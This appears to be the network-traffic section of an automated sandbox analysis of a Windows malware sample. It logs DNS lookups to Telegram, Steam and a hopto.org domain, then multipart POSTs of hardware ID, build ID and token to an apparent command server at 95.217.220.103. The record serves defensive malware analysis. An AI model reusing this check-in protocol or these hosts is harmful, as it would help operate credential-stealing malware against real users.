                                                                                                                                                                                                            Oct 23, 2024 07:04:01.929255009 CEST4435001095.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:01.929292917 CEST4435001095.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:01.929306984 CEST50010443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:01.929347038 CEST50010443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:01.929438114 CEST50010443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:01.929455996 CEST4435001095.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:01.953830957 CEST50011443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:01.953923941 CEST4435001195.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:01.954216957 CEST50011443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:01.954216957 CEST50011443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:01.954355001 CEST4435001195.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:02.819197893 CEST4435001195.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:02.819274902 CEST50011443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:02.819899082 CEST50011443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:02.819928885 CEST4435001195.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:02.821713924 CEST50011443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:02.821727991 CEST4435001195.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:03.473726988 CEST4435001195.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:03.473906040 CEST4435001195.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:03.473937035 CEST50011443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:03.474100113 CEST50011443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:03.491409063 CEST50011443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:03.491453886 CEST4435001195.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:04.039166927 CEST50012443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:04.039263010 CEST4435001295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:04.039355993 CEST50012443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:04.039628983 CEST50012443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:04.039654970 CEST4435001295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:04.926043987 CEST4435001295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:04.926275969 CEST50012443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:04.926624060 CEST50012443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:04.926655054 CEST4435001295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:04.928323984 CEST50012443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:04.928337097 CEST4435001295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:04.928437948 CEST50012443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:04.928466082 CEST4435001295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:04.928508043 CEST50012443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:04.928539991 CEST4435001295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:04.928630114 CEST50012443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:04.928673983 CEST4435001295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:04.928692102 CEST50012443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:04.928706884 CEST4435001295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:04.928843975 CEST50012443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:04.928894043 CEST50012443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:04.928894043 CEST50012443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:04.928988934 CEST4435001295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:04.929122925 CEST50012443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:04.929160118 CEST4435001295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:06.591176033 CEST4435001295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:06.591397047 CEST4435001295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:06.591417074 CEST50012443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:06.591567993 CEST50012443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:06.591567993 CEST50012443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:06.639082909 CEST50013443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:06.639120102 CEST4435001395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:06.639200926 CEST50013443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:06.639471054 CEST50013443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:06.639487028 CEST4435001395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:06.902203083 CEST50012443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:06.902276039 CEST4435001295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:07.550564051 CEST4435001395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:07.550843000 CEST50013443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:07.560693026 CEST50013443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:07.560702085 CEST4435001395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:07.562212944 CEST50013443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:07.562217951 CEST4435001395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:08.277369976 CEST4435001395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:08.277451038 CEST50013443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:08.277467012 CEST4435001395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:08.277510881 CEST50013443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:08.277545929 CEST4435001395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:08.277595997 CEST50013443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:08.277715921 CEST50013443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:08.277733088 CEST4435001395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:08.279551983 CEST50014443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:08.279647112 CEST4435001495.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:08.279869080 CEST50014443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:08.280143976 CEST50014443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:08.280179977 CEST4435001495.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:09.179578066 CEST4435001495.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:09.179771900 CEST50014443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:09.180248976 CEST50014443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:09.180277109 CEST4435001495.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:09.181998968 CEST50014443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:09.182012081 CEST4435001495.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:09.876641989 CEST4435001495.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:09.876753092 CEST50014443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:09.876773119 CEST4435001495.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:09.876836061 CEST50014443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:09.876936913 CEST50014443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:04:09.876979113 CEST4435001495.217.220.103192.168.2.6

                                                                                                                                                                                                            UDP Packets

                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                            Oct 23, 2024 07:02:57.185329914 CEST6033053192.168.2.61.1.1.1
                                                                                                                                                                                                            Oct 23, 2024 07:02:57.458802938 CEST53603301.1.1.1192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:07.295788050 CEST5517053192.168.2.61.1.1.1
                                                                                                                                                                                                            Oct 23, 2024 07:03:07.304579973 CEST53551701.1.1.1192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:04:09.892918110 CEST5280653192.168.2.61.1.1.1
                                                                                                                                                                                                            Oct 23, 2024 07:04:09.903908968 CEST53528061.1.1.1192.168.2.6

                                                                                                                                                                                                            DNS Queries

                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                            Oct 23, 2024 07:02:57.185329914 CEST192.168.2.61.1.1.10x49deStandard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Oct 23, 2024 07:03:07.295788050 CEST192.168.2.61.1.1.10x8b9bStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Oct 23, 2024 07:04:09.892918110 CEST192.168.2.61.1.1.10xaefeStandard query (0)cowod.hopto.orgA (IP address)IN (0x0001)false

                                                                                                                                                                                                            DNS Answers

                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                            Oct 23, 2024 07:02:57.458802938 CEST1.1.1.1192.168.2.60x49deNo error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Oct 23, 2024 07:03:07.304579973 CEST1.1.1.1192.168.2.60x8b9bNo error (0)steamcommunity.com23.192.247.89A (IP address)IN (0x0001)false

                                                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                                                            • t.me
                                                                                                                                                                                                            • steamcommunity.com
                                                                                                                                                                                                            • 95.217.220.103
                                                                                                                                                                                                            • 107.191.36.218

                                                                                                                                                                                                            HTTP Packets

                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            0192.168.2.649951107.191.36.218806484C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Oct 23, 2024 07:02:58.794605017 CEST89OUTGET / HTTP/1.1
                                                                                                                                                                                                            Host: 107.191.36.218
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cache-Control: no-cache


                                                                                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            0192.168.2.649940149.154.167.994436484C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-10-23 05:02:58 UTC92OUTGET /fun88rockskek HTTP/1.1
                                                                                                                                                                                                            Host: t.me
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            2024-10-23 05:02:58 UTC511INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                                                                                            Date: Wed, 23 Oct 2024 05:02:58 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                            Content-Length: 12425
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: stel_ssid=6a9de2bc16c71e870e_3526692613400229604; expires=Thu, 24 Oct 2024 05:02:58 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            Cache-control: no-store
                                                                                                                                                                                                            X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                            Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                            Strict-Transport-Security: max-age=35768000
                                                                                                                                                                                                            2024-10-23 05:02:58 UTC12425INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 66 75 6e 38 38 72 6f 63 6b 73 6b 65 6b 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @fun88rockskek</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            1192.168.2.64998823.192.247.894436484C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-10-23 05:03:08 UTC119OUTGET /profiles/76561199786602107 HTTP/1.1
                                                                                                                                                                                                            Host: steamcommunity.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            2024-10-23 05:03:08 UTC1891INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://ste [TRUNCATED]
                                                                                                                                                                                                            Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Date: Wed, 23 Oct 2024 05:03:08 GMT
                                                                                                                                                                                                            Content-Length: 34570
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: sessionid=0ef2af96d68a2b9373012721; Path=/; Secure; SameSite=None
                                                                                                                                                                                                            Set-Cookie: steamCountry=US%7Cb9e7f3651c38ac41ccf738a8ba3498dc; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                            2024-10-23 05:03:08 UTC14493INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                                                                            2024-10-23 05:03:08 UTC10083INData Raw: 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 69 64 3d 22 67 6c 6f 62 61 6c
                                                                                                                                                                                                            Data Ascii: tipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="navigation" id="global
                                                                                                                                                                                                            2024-10-23 05:03:08 UTC9994INData Raw: 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 61 73 73 65 74 73 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 53 54 4f 52 45 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 6f 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 50 55 42 4c 49 43 5f 53 48 41 52 45 44 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 6f 6d 6d 75 6e 69 74 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 70 75 62 6c 69 63 5c 2f 73 68 61 72 65 64 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 4d 4d 55 4e 49 54 59 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74
                                                                                                                                                                                                            Data Ascii: static.com\/steamcommunity\/public\/assets\/&quot;,&quot;STORE_CDN_URL&quot;:&quot;https:\/\/store.steamstatic.com\/&quot;,&quot;PUBLIC_SHARED_URL&quot;:&quot;https:\/\/community.steamstatic.com\/public\/shared\/&quot;,&quot;COMMUNITY_BASE_URL&quot;:&quot


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            2192.168.2.64998995.217.220.1034436484C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-10-23 05:03:10 UTC187OUTGET / HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                            Host: 95.217.220.103
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            2024-10-23 05:03:10 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Wed, 23 Oct 2024 05:03:10 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            2024-10-23 05:03:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            3192.168.2.64999095.217.220.1034436484C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-10-23 05:03:11 UTC279OUTPOST / HTTP/1.1
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----KEGDAKEHJDHIDHJJDAEC
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                            Host: 95.217.220.103
                                                                                                                                                                                                            Content-Length: 255
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            2024-10-23 05:03:11 UTC255OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 42 45 36 42 37 37 37 33 31 43 43 36 36 31 31 37 39 33 34 38 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 35 31 35 38 66 65 61 64 62 33 63 65 62 66 61 35 63 39 61 39 65 33 36 66 30 64 34 36 31 66 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 43 2d 2d 0d 0a
                                                                                                                                                                                                            Data Ascii: ------KEGDAKEHJDHIDHJJDAECContent-Disposition: form-data; name="hwid"CBE6B77731CC661179348-a33c7340-61ca------KEGDAKEHJDHIDHJJDAECContent-Disposition: form-data; name="build_id"65158feadb3cebfa5c9a9e36f0d461fe------KEGDAKEHJDHIDHJJDAEC--
                                                                                                                                                                                                            2024-10-23 05:03:12 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Wed, 23 Oct 2024 05:03:12 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            2024-10-23 05:03:12 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 35 65 34 35 64 64 62 31 33 65 34 61 30 36 62 66 65 36 62 32 36 61 39 34 31 65 31 37 62 33 34 38 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 3a1|1|1|1|5e45ddb13e4a06bfe6b26a941e17b348|1|1|1|0|0|50000|10


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            4192.168.2.64999195.217.220.1034436484C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-10-23 05:03:13 UTC279OUTPOST / HTTP/1.1
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----KEGDAKEHJDHIDHJJDAEC
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                            Host: 95.217.220.103
                                                                                                                                                                                                            Content-Length: 331
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            2024-10-23 05:03:13 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 34 35 64 64 62 31 33 65 34 61 30 36 62 66 65 36 62 32 36 61 39 34 31 65 31 37 62 33 34 38 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 35 31 35 38 66 65 61 64 62 33 63 65 62 66 61 35 63 39 61 39 65 33 36 66 30 64 34 36 31 66 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                                            Data Ascii: ------KEGDAKEHJDHIDHJJDAECContent-Disposition: form-data; name="token"5e45ddb13e4a06bfe6b26a941e17b348------KEGDAKEHJDHIDHJJDAECContent-Disposition: form-data; name="build_id"65158feadb3cebfa5c9a9e36f0d461fe------KEGDAKEHJDHIDHJJDAECCont
                                                                                                                                                                                                            2024-10-23 05:03:14 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Wed, 23 Oct 2024 05:03:14 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
